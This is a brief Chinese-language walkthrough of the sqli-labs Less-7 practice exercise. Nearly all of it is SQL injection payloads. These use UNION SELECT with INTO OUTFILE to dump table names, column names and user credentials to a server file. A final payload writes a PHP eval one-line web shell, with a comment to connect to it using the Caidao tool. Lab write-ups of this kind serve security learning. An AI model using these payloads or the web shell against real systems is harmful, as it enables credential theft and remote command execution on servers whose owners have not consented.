可以导出数据或导入木马达成目标
导出:
/Less-7/?id=1'))--+
/Less-7/?id=1'))union select 1,2,3--+
/Less-7/?id=1'))union select 1,2,version() into outfile "/var/lib/mysql-files/1.txt"--+ //通过对服务器mysql的白盒测试发现的secure-file-priv为/var/lib/mysql-files/
/Less-7/?id=1'))union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() into outfile "/var/lib/mysql-files/1.txt"--+ //爆表
/Less-7/?id=1'))union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' into outfile "/var/lib/mysql-files/1.txt"--+ //爆字段
/Less-7/?id=1'))union select 1,username,password from security.users into outfile "/var/lib/mysql-files/1.txt"--+ //爆内容
导入:
union select 1,2,'<?php eval($_POST["cmd"]);?>' into outfile "**.php" //导入一句话木马
//之后用菜刀链接